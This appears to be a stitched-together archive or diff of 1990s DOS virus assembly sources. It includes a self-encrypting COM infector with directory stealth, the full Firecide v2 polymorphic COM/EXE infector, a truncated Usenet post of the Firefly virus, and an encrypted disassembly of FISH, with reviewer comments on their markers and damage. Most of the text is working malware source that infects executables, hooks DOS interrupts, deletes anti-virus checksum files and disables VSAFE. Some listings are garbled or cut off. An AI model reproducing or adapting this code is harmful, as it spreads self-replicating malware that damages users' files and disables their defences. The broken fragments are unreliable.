mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code rd ptr [di],0b6bh
dec word ptr [di]
dec word ptr [di]
sub byte ptr [di],059h
dec word ptr [di]
xor word ptr [di],0dddbh
xor word ptr [di],0e3ddh
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;------------------------
action: ;Nothing Action!
NOP ;only replicate
ret ;Return to call
;------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 020H ;day for the action
action_mes Db 0dH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
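Review bot: The banner at the top of this section names the generator but documents none of the behaviour below it, and the listing itself is damaged, so it should carry an analyst header that says both. The markers visible in the code are the residency handshake (`MOV AX,0CACAH` / `INT 21H`, answered in `VIRUS:` with `mov bh,0cah`), the timestamp seconds mask `FECHA`/`FECHAd` (01eH) used by `REPRODUCCION` and `dir_s`, and the `ANTI_V` call with `AX=0FA01H`, `DX=5945H`. A two-line comment such as `; Resident check: INT 21h AX=0CACAh -> BH=0CAh` and `; Infected-file marker: seconds field = 1Eh (FECHA/FECHAd)` would cover them. The damage is the stray `ÿ` bytes in front of several lines and the `enc:` loop, which runs into a comment fragment and ends in `loop enc2` with no `enc2` label in the section, so I would add `; NOTE: listing incomplete between enc: and loop enc2` rather than leave readers to assume it assembles.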
@@ -0,0 +1,382 @@
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
; Firecide u2 - (c)1995 ûirogen - Using ûiCE v0.2á
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
;
; þ Infects COM and EXE when executed.
; þ COM Infection marker: fourth byte is 0
; þ EXE infection marker: Checksum in header not equal to 0.
; þ Time/Date do not change
; þ Read-only and hidden files will be infected, and attributes restored.
; þ Virus installs its own critical error handler
; þ Deletes MSAV,CPAV checksum filez
; þ Call ViCE with JMPs OFF, Anti-TBSCAN On, and Garbage On
;
cseg segment
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
signal equ 0FA01h ; AX=signal/INT 21h/installation chk
vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API
act_day equ 1
buf_size equ 170
vice_size equ 1587+buf_size
virus_size equ (offset vend-offset start)+VICE_SIZE
extrn _vice:near
org 0h
start:
call nx ; get relative offset
nx: pop bp
sub bp,offset nx
push ds es
inc si
mov ax,signal ; are we memory resident?
mov dx,vsafe_word
int 21h
or si,si
jz no_install ; if carry then we are
mov cs:activate[bp],0
mov ah,2ah ; get date
int 21h
cmp dl,act_day ;
jnz no_act
mov cs:activate[bp],1
no_act:
mov ax,ds ; PSP segment
dec ax ; mcb below PSP m0n
mov ds,ax ; DS=MCB seg
cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain?
jnz no_install
sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB
sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP
mov es,word ptr ds: [12h] ; get high mem seg
push cs
pop ds
mov si,bp
mov cx,virus_size/2+1
xor di,di
rep movsw ; copy code to new seg
xor ax,ax
mov ds,ax ; null ds
push ds
lds ax,ds: [21h*4] ; get 21h vector
mov es: word ptr old21+2,ds ; save S:O
mov es: word ptr old21,ax
pop ds
mov ds: [21h*4+2],es ; new int 21h seg
mov ds: [21h*4],offset new21 ; new offset
sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem
no_install:
pop es ds ; restore ES DS
cmp cs:is_exe[bp],1
jz exe_return
lea si,org_bytes[bp] ; com return
mov di,0100h ; -restore first 4 bytes
mov cx,2
rep movsw
mov ax,100h ; jump back to 100h
push ax
_ret:ret
exe_return:
mov cx,ds ; calc. real CS
add cx,10h
add word ptr cs:[exe_jump+2+bp],cx
int 3 ; fix prefetch
db 0eah
exe_jump dd 0
is_exe db 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Infection routine - called from INT 21h handler.
; DS:DX=fname
;
infect_file:
push dx
pop si
push ds
xor ax,ax ; null ES
mov es,ax
lds ax,es:[24h*4] ; get INT 24h vector
mov cs:old_24_off,ax ; save it
mov cs:old_24_seg,ds
mov es:[24h*4+2],cs ; install our handler
mov es:[24h*4],offset new_24
pop ds
push es ; we'll need it later
push cs
pop es
mov ax,4300h ; get phile attribute
int 21h
mov ax,4301h ; null attribs
push ax cx ; save AX-call/CX-attrib
xor cx,cx
int 21h
mov ax,3d02h ; open the file
int 21h
jc dont_do
mov bx,ax ; get handle
push cs
pop ds
mov ah,3fh ; Read first bytes of file
mov cx,20h
lea dx,org_bytes
int 21h
call kill_chklst
cmp byte ptr org_bytes,'M'
jz do_exe
cmp byte ptr org_bytes+3,0
jz close
mov is_exe,0
mov ax,5700h ; get time/date
int 21h
push cx dx
call offset_end
push ax ; AX=end of file
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor/
push di ; encrypted code. (at heap)
mov cx,virus_size ; CX=virus size
mov dx,ax ; DX=EOF offset
add dx,100h ; DX=offset decryptor will run from
mov al,00000111b ; no jmps,anti-tbscan, garbage, no CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
pop ax ; restore COM file size
sub ax,3 ; calculate jmp offset
mov word ptr new_jmp+1,ax
lea dx,new_jmp
mov cx,4
mov ah,40h
int 21h
pop dx cx ; pop date/time
mov ax,5701h ; restore the mother fuckers
int 21h
close:
pop cx ax ; restore attrib
int 21h
mov ah,3eh
int 21h
dont_do:
pop es ; ES=0
lds ax,dword ptr old_24_off ; restore shitty DOS error handler
mov es:[24h*4],ax
mov es:[24h*4+2],ds
ret
do_exe:
cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0?
jnz close
cmp byte ptr exe_header[18h],52h ; pklite'd?
jz exe_ok
cmp byte ptr exe_header[18h],40h ; don't infect new format exe
jge close
exe_ok:
push bx
mov ah,2ch ; grab a random number
int 21h
mov word ptr exe_header[12h],dx ; mark that it's us
mov is_exe,1
les ax,dword ptr exe_header+14h ; Save old entry point
mov word ptr ds:exe_jump, ax
mov word ptr ds:exe_jump+2, es
push cs
pop es
call offset_end
push dx ax ; save file size DX:AX
mov bx, word ptr exe_header+8h ; calc. new entry point
mov cl,4 ; *16
shl bx,cl ; ^by shifting one byte
sub ax,bx ; get actual file size-header
sbb dx,0
mov cx,10h ; divide AX/CX rDX
div cx
mov word ptr exe_header+14h,dx
mov word ptr exe_header+16h,ax
mov rel_off,dx
pop ax ; AX:DX file size
pop dx
pop bx
mov cx,virus_size+10h ; calc. new size
adc ax,cx
mov cl,9 ; calc new alloc (512)
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax ; ax=size+virus
and ah,1
mov word ptr exe_header+4h,dx
mov word ptr exe_header+2h,ax
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor and
push di ; encrypted code (at heap)
mov cx,virus_size ; CX=virus size
mov dx,rel_off ; DX=offset decryptor will run from
mov al,00000110b ; no jmps,anti-tbscan,garbage, use CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
mov cx,18h ; write fiXed header
lea dx,exe_header
mov ah,40h
int 21h
jmp close
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; set file ptr
offset_zero: ; self explanitory
xor al,al
jmp set_fp
offset_end:
mov al,02h
set_fp:
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Kill those darned MSAV and CPAV filez..
;
kill_chklst:
mov di,2 ; counter for loop
lea dx,first_2die ; first fname to kill
kill_loop:
mov ax,4301h ; reset attribs
xor cx,cx
int 21h
mov ah,41h ; delete phile
int 21h
lea dx,last_2die ; second fname to kill
dec di
jnz kill_loop
ret
first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum
last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; new 21h
new21:
pushf
cmp ax,signal ; be it us?
jnz not_us ; richtig..
cmp dx,vsafe_word
jnz not_us
xor si,si
mov di,4559h
jmp jmp_org
not_us:
cmp cs:activate,0 ; time to activate?
jz nchk
cmp ah,2 ; output character?
jz do_me
nchk: cmp ax,4b00h ; execute phile?
jnz jmp_org
push ax bx cx di dx si ds es
call infect_file
pop es ds si dx di cx bx ax
jmp_org:
popf
db 0eah ; jump far XXXX:XXXX
old21 dd 0
do_me:
push si
mov si,cs:txt_ptr
mov dl,byte ptr cs:[si]
inc si
cmp si,offset credit_end
jl not_there
mov si,offset credits
not_there:
mov cs:txt_ptr,si
pop si
jmp jmp_org
new_24: ; critical error handler
mov al,3 ; prompts suck, return fail
iret
activate db 0
txt_ptr dw offset credits
credits db 'þFireCide2, by ûirogenþ'
credit_end:
new_jmp db 0E9h,0,0,0 ; jmp XXXX,0
rel_off dw 0
exe_header:
org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr
heap:
db 16h dup(0) ; remaining exe header space
old_24_off dw 0 ; old int24h vector
old_24_seg dw 0
vend:
cseg ends
end start
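Review bot: The comment on `jz no_install` says `if carry then we are`, but the test above it is `or si,si`, and the resident side (`new21`) answers the `signal`/`vsafe_word` call with `xor si,si` and `mov di,4559h`, not with the carry flag; the comment should read `; SI=0 on return: resident copy answered`. The header bullet list documents the file markers but not this handshake or the memory footprint, so I would add `; Residency check: INT 21h AX=0FA01h, DX=5945h -> SI=0, DI=4559h` and `; Resident copy shrinks the last MCB and the BIOS memory word at 0:413h`. The engine is pulled in with `extrn _vice:near` and is not part of this section, which is worth stating in the header as well.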
@@ -0,0 +1,75 @@
From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
Xref: netcom.com alt.comp.virus:491
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
From: halflife@axpvms.cc.utexas.edu
Newsgroups: alt.comp.virus
Subject: Firefly virus
Date: 28 Nov 1994 08:51:37 GMT
Organization: University of Texas @ Austin
Lines: 61
Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
Reply-To: halflife@axpvms.cc.utexas.edu
NNTP-Posting-Host: axpvms.cc.utexas.edu
;FIREFLY virus, by Nikademus.
;
;Firefly is an encrypted, memory resident virus which infects
;.COMfiles on load. It incorporates code from Proto-T,
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
;of anti-virus programs as they are executed. Anti-virus programs
;identified by Firefly's execute/load handler are deleted.
;Firefly incorporates simple code from previous issues of the newsletter
;designed to de-install generic VSAFE resident virus activity
;filters designed for Microsoft by Central Point Software. It
;contains instructions - specifically a segment of pseudo-nested
;loops - which spoof F-Protect's expert system generic virus
;identification feature.
;
;FIREFLY also includes a visual marker tied to the system timer
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
;and ScrollLock LEDs on the keyboard. This produces a noticeable
;twinkling effect when the virus is active on a machine.
;
;Anti-anti-virus measures used by Firefly vary in effectiveness
;dependent upon how a user employs software. For example, while
;Firefly is designed to delete the Victor Charlie anti-virus
;shell, VC.EXE, a user who employs the software packages utilities
;for generic virus detection singly, will not be interfered with
;by the virus. Your results may vary, but the virus does effectively
;delete anti-virus programs while in memory unless steps are taken
;beforehand to avoid this.
;
;Firefly incorporates minor code armoring techniques designed to thwart
;trivial debugging.
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
len equ offset last - start
vir_len equ len / 16d ; 16 bytes per paragraph
encryptlength equ (last - begin)/4+1
start:
mov bx, offset begin ; The Encryption Head
mov cx, encryptlength ;
encryption_loop: ;
db 81h ; XOR WORD PTR [BX], ????h
db 37h ;
encryption_value_1: ;
dw 0000h ;
;
db 81h ; XOR WORD PTR [BX+2], ????h
db 77h ;
db 02h ; 2 different random words
encryption_value_2: ; give 32-bit encryption
dw 0000h ;
add bx, 4 ;
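Review bot: This file is an incomplete excerpt and nothing in it says so: the Usenet header announces `Lines: 61`, but as shown here the code stops at `add bx, 4` inside `encryption_loop`, and the labels `begin` and `last` that `len` and `encryptlength` refer to never appear. The raw news headers above `;FIREFLY virus` are also not commented out, so this is a saved post rather than a source listing. For an archive entry I would add a first line such as `; NOTE: truncated Usenet post - only the description and the start of the decryptor head are present`, so nobody treats it as a full sample when cataloguing the family or building detection from it.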
+738
@@ -0,0 +1,738 @@
PAGE 59,132
;==========================================================================
;== ==
;== FISH ==
;== ==
;== Created: 29-Oct-90 ==
;== Version: ==
;== Passes: 5 Analysis Options on: AFKOPUX ==
;== ==
;== ==
;==========================================================================
movseg macro reg16, unused, Imm16 ; Fixup for Assembler
ifidn <reg16>, <bx>
db 0BBh
endif
ifidn <reg16>, <cx>
db 0B9h
endif
ifidn <reg16>, <dx>
db 0BAh
endif
ifidn <reg16>, <si>
db 0BEh
endif
ifidn <reg16>, <di>
db 0BFh
endif
ifidn <reg16>, <bp>
db 0BDh
endif
ifidn <reg16>, <sp>
db 0BCh
endif
ifidn <reg16>, <BX>
db 0BBH
endif
ifidn <reg16>, <CX>
db 0B9H
endif
ifidn <reg16>, <DX>
db 0BAH
endif
ifidn <reg16>, <SI>
db 0BEH
endif
ifidn <reg16>, <DI>
db 0BFH
endif
ifidn <reg16>, <BP>
db 0BDH
endif
ifidn <reg16>, <SP>
db 0BCH
endif
dw seg Imm16
endm
DATA_1E EQU 0B3H ; (97E0:00B3=0)
DATA_5E EQU 5A2BH ; (97E0:5A2B=0)
DATA_6E EQU 5E5DH ; (97E0:5E5D=0)
DATA_7E EQU 6920H ; (97E0:6920=0)
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
FISH PROC FAR
START:
JMP LOC_4 ; (0EDE)
PUSH AX
CMC ; Complement carry
SUB DX,SI
JLE $-3FH ; Jump if < or =
SUB AL,7FH
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
POP ES
POP DS
POP DI
ADD CL,CH
RETF 0CD0DH ; Return far
AND [BX+DI+50H],BH
nop ;*ASM fixup - displacement
MOV SI,DATA_7E ; (97E0:6920=0)
JNC LOC_1 ; Jump if carry=0
DB 'a tiny VOM p'
DB 0EBH, 7AH, 67H, 72H, 61H, 6DH
DB 00H, 9CH, 2EH,0FFH, 1EH, 35H
DB 0EH,0C3H
DB 0DH, 4EH, 42H, 49H, 23H, 82H
LOC_1:
OR SP,DI
ADD DX,DS:DATA_6E[BX+DI] ; (97E0:5E5D=0)
POP SP
POP DI
POP BX
POP DX
ADC CX,[BP+DI]
AND SI,DX
SUB SP,DI
ADD SP,[BP+DI]
OR BYTE PTR [BP+DI],0E7H
ADD CX,[BP+SI]
ADC DL,[BP+SI+53H]
PUSH DI
PUSH SP
PUSH SI
PUSH BP
NOP
AND SI,DX
SUB SP,DI
ADD BX,[BP+45H]
DEC SP
POP DI
INC SI
AND AX,DS:DATA_5E[SI] ; (97E0:5A2B=0)
ADD AH,[BP+DI]
SBB WORD PTR [BP+DI],254H
ADD BX,[BP+SI]
AND AX,[BP+562BH]
ADD AH,[BP+DI]
IN AX,0DEH ; port 0DEH
DB 0F2H, 23H, 83H, 1BH, 54H, 02H
DB 23H, 84H, 2BH, 56H, 02H, 23H
DB 86H, 2BH, 5AH, 02H,0CEH, 23H
DB 84H, 2BH, 5AH, 02H, 23H, 81H
DB 1BH, 54H, 02H, 03H, 1AH, 23H
DB 86H, 2BH, 56H, 02H, 23H,0E5H
DB 96H,0F2H, 23H, 83H, 1BH, 54H
DB 02H, 23H, 84H, 2BH, 56H, 02H
DB 23H, 86H, 2BH, 5AH, 02H,0CEH
DB 81H,0B3H, 46H, 03H, 23H,0C9H
DB 33H, 38H, 03H, 03H, 12H,0F1H
DB 0B4H
DB 8, 0DH, 0A1H, '+', 8BH, 8, 85H, 'I'
DB 0F2H, 4AH,0EFH,0FBH,0CEH, 4EH
DB 4CH, 5FH, 5DH,0BDH, 0CH, 03H
DB 12H,0B7H,0BAH, 01H,0E5H, 0CH
DB 0DH,0CEH, 0BH, 5EH, 3EH,0D6H
DB 83H,0CEH, 87H,0D5H,0DCH,0EEH
DB 0DCH,0EEH, 2BH, 84H, 1AH, 2BH
DB 81H, 52H, 0FH, 56H, 0AH,0CEH
DB 13H, 5BH, 3EH,0FBH, 83H,0D3H
DB 3FH,0E9H, 86H,0FDH,0DCH,0EBH
DB 0DCH,0EBH, 86H, 11H, 83H, 49H
DB 0FH, 53H, 12H,0CEH, 4FH, 4CH
DB 5EH, 5EH,0E5H,0BDH, 0FH,0B4H
DB 0E5H, 5BH, 07H, 83H, 23H,0AEH
DB 0EEH, 03H,0B9H, 5FH, 23H,0CAH
DB 0BH, 56H, 02H, 0DH, 1DH, 23H
DB 81H, 13H, 48H, 03H,0E5H, 8DH
DB 06H,0E6H,0C0H, 2CH, 2BH, 86H
DB 4AH,0F3H, 23H,0AEH, 4AH, 03H
DB 03H, 12H,0E5H, 3DH, 07H,0ACH
DB 0BDH, 2CH,0E5H,0BEH,0F2H, 81H
DB 0BH, 22H, 03H, 84H, 13H, 20H
DB 03H,0B7H,0BAH, 01H,0BDH, 0CH
DB 0CBH, 0BH, 5DH, 03H, 0DH,0E5H
DB 85H,0F2H, 91H, 55H, 00H, 0DH
DB 0CH, 5DH, 90H, 91H,0B9H, 6CH
DB 0F2H, 13H, 20H, 03H, 91H, 55H
DB 28H,0F2H,0F3H, 5DH, 90H,0E5H
DB 0ECH, 0CH,0AEH,0C9H, 33H, 20H
DB 03H, 81H, 0BH, 3AH, 03H,0CBH
DB 0BH, 46H, 03H,0E7H,0CAH, 0BH
DB 41H, 03H, 56H, 00H, 84H, 33H
DB 38H, 03H, 81H, 03H, 43H, 03H
DB 0E5H, 0AH, 0DH,0E5H, 2BH,0F2H
DB 0E5H, 1AH, 07H, 84H,0BDH, 22H
DB 0E5H, 56H,0F2H, 81H,0CEH, 23H
DB 34H, 13H, 4AH, 03H, 7EH, 11H
DB 0E5H, 32H, 07H, 23H, 83H, 13H
DB 22H, 03H, 23H,0F2H, 3BH, 20H
DB 03H, 57H,0BDH, 1EH,0E5H, 24H
DB 0F2H, 3EH,0D6H, 83H,0D6H,0CBH
DB 0BH, 78H, 09H, 0FH,0CEH
DB '-KD^E-[D_X^-.;- -HLNE-IDKK- -OBC'
DB 'C-?"4=-*sfcwt{bp*)'
DB 0E5H,0CFH,0F3H, 23H, 81H, 03H
DB 43H, 03H,0E5H,0B7H,0F3H, 03H
DB 12H, 13H, 0AH,0ACH, 48H, 03H
DB 83H,0CDH, 2BH,0C8H, 1BH, 07H
DB 0DH, 83H,0D5H, 08H, 1DH, 0DH
DB 23H, 0CH, 0BH, 17H, 0DH, 23H
DB 8DH, 33H, 2DH, 0DH, 0DH,0F6H
DB 78H, 29H, 23H,0ACH, 09H, 0DH
DB 0AEH, 0DH, 0CH, 23H,0ACH, 0BH
DB 0DH,0AEH, 0FH, 0CH, 23H,0ACH
DB 05H, 0DH,0AEH, 09H, 0CH, 23H
DB 0F2H, 3BH, 48H, 03H, 3EH,0CDH
DB 0F3H,0C9H, 5DH, 23H,0ACH,0EEH
DB 03H,0C6H, 23H, 0CH, 0BH, 1FH
DB 0DH, 23H,0ACH,0EEH, 03H, 23H
DB 86H, 2BH, 19H, 0DH, 23H, 83H
DB 1BH, 1FH, 0DH, 23H,0F2H, 23H
DB 15H
DB 0DH, 59H, 5FH, 42H, 58H, 59H
LOC_2:
DB 3EH,0E9H,0E5H, 0DH, 0DH, 84H
DB 0C8H, 81H,0C5H,0B6H, 1DH, 0DH
DB 0FAH,0EEH, 54H, 8CH,0E4H, 42H
DB 0FH, 0EH,0CCH, 8EH,0DFH, 0DH
DB 0FAH,0FEH, 5DH,0B5H,0F7H, 0DH
DB 5DH, 84H,0E5H,0C6H,0E5H,0C1H
DB 0DH,0C0H,0E5H, 29H, 07H,0C6H
DB 5EH, 86H,0D1H, 3BH, 86H, 52H
DB 0BH, 23H, 84H, 13H,0BEH, 03H
DB 56H, 58H, 84H,0E8H,0E5H,0DDH
DB 05H,0AEH,0E5H,0FCH,0F0H,0E5H
DB 19H,0F3H,0E5H,0CBH,0F0H,0E5H
DB 95H,0F0H,0E5H,0CDH, 05H, 85H
DB 8DH,0F1H, 02H, 78H, 09H,0E4H
DB 0E4H, 0DH,0B5H, 8DH,0F1H, 1CH
DB 78H, 09H,0E4H, 96H, 0DH,0ACH
DB 8DH,0F1H, 1FH, 78H, 09H,0E4H
DB 9FH, 0DH, 84H, 8DH,0F1H, 19H
DB 78H, 09H,0E4H, 04H, 0CH,0E6H
DB 8DH,0F1H, 2CH, 78H, 09H,0E4H
DB 0F9H, 0DH, 81H, 8DH,0F1H, 2EH
DB 78H, 09H,0E4H, 89H, 0CH,0AEH
DB 8DH,0F1H, 2AH, 78H, 09H,0E4H
DB 0EDH, 0DH,0E6H, 8DH,0F1H, 30H
DB 78H, 09H,0E4H,0CBH
DATA_3 DW 0F20CH ; Data table (indexed access)
DB 8DH,0F1H, 33H, 78H, 09H,0E4H
DB 0CH, 0FH,0ACH, 8DH,0F1H, 32H
DB 78H, 09H,0E4H, 70H, 0AH, 85H
DB 8DH,0F1H, 4FH, 78H, 09H,0E4H
DB 4FH, 0AH, 81H, 8DH,0F1H, 46H
DB 78H, 09H,0E4H, 11H, 0FH,0E6H
DB 8DH,0F1H, 43H, 78H, 09H,0E4H
DB 5EH, 05H, 84H, 8DH,0F1H, 42H
DB 78H, 09H,0E4H, 47H, 05H, 83H
DB 8DH,0F1H, 5AH, 78H, 0EH,0E4H
DB 0C2H, 0BH,0E4H, 5AH, 04H,0E6H
DB 0E5H, 7FH, 04H,0ACH,0E5H, 5EH
DB 0F0H,0E5H, 7BH,0F0H,0E5H, 25H
DB 0F0H, 84H,0E8H, 23H,0F2H, 3BH
DB 0BEH, 03H, 82H, 4BH, 0BH, 50H
DB 0C2H, 23H,0F2H, 0BH, 3CH, 03H
DB 0E4H, 19H, 05H,0ACH,0E5H,0F5H
DB 0F1H,0E5H,0DAH,0F1H, 07H,0CDH
DB 78H,0D9H,0E5H,0D6H,0F1H,0E5H
DB 0CCH, 0CH,0BDH, 0DH, 8DH, 32H
DB 0F2H, 78H, 0BH, 87H, 4AH, 0BH
DB 8EH,0CEH, 0AH, 23H, 2DH, 0BH
DB 0FDH, 03H,0FBH, 4AH, 17H, 8DH
DB 79H, 18H, 8DH, 62H, 17H,0C5H
DB 23H, 8DH, 33H,0FDH, 03H, 0DH
DB 78H, 04H, 8CH, 62H, 10H, 0DH
DB 03H, 8EH, 52H, 12H, 0DH,0E5H
DB 0B6H,0F1H,0E6H, 91H, 4BH, 44H
DB 43H,0E5H,0BEH,0F1H,0E5H, 9FH
DB 0F1H,0E5H, 97H,0F1H, 07H,0CDH
DB 78H,0E6H, 84H,0DEH,0FBH, 4AH
DB 18H, 8DH, 79H,0EEH, 8DH, 62H
DB 18H,0C5H, 8CH, 62H, 1DH, 0DH
DB 03H, 8DH, 52H, 1FH, 0DH,0E6H
DB 0D9H, 23H,0F2H, 03H, 3CH, 03H
DB 0E4H,0AFH, 0AH,0AEH,0EEH, 16H
DB 84H,0DEH, 86H, 7AH, 2CH, 06H
DB 7AH, 2EH, 78H, 1CH,0E6H, 07H
DB 84H,0DEH, 86H, 4AH, 01H, 07H
DB 4AH, 2DH, 78H, 08H,0E5H,0EEH
DB 09H, 7EH, 0EH,0E4H, 45H,0F2H
DB 0E5H, 6BH,0F1H,0E5H, 5DH,0F1H
DB 0E5H, 4FH,0F1H, 84H, 43H,0F5H
DB 84H, 4BH,0F1H, 13H, 5FH,0E5H
DB 26H, 0CH, 8EH, 72H, 19H, 0CH
DB 79H, 16H, 86H, 0AH, 0EH, 4AH
DB 0FH, 5EH, 86H, 52H, 09H,0FAH
DB 0DEH, 0CH,0D5H, 56H, 79H, 06H
DB 8EH,0C9H, 09H,0E4H, 76H,0F2H
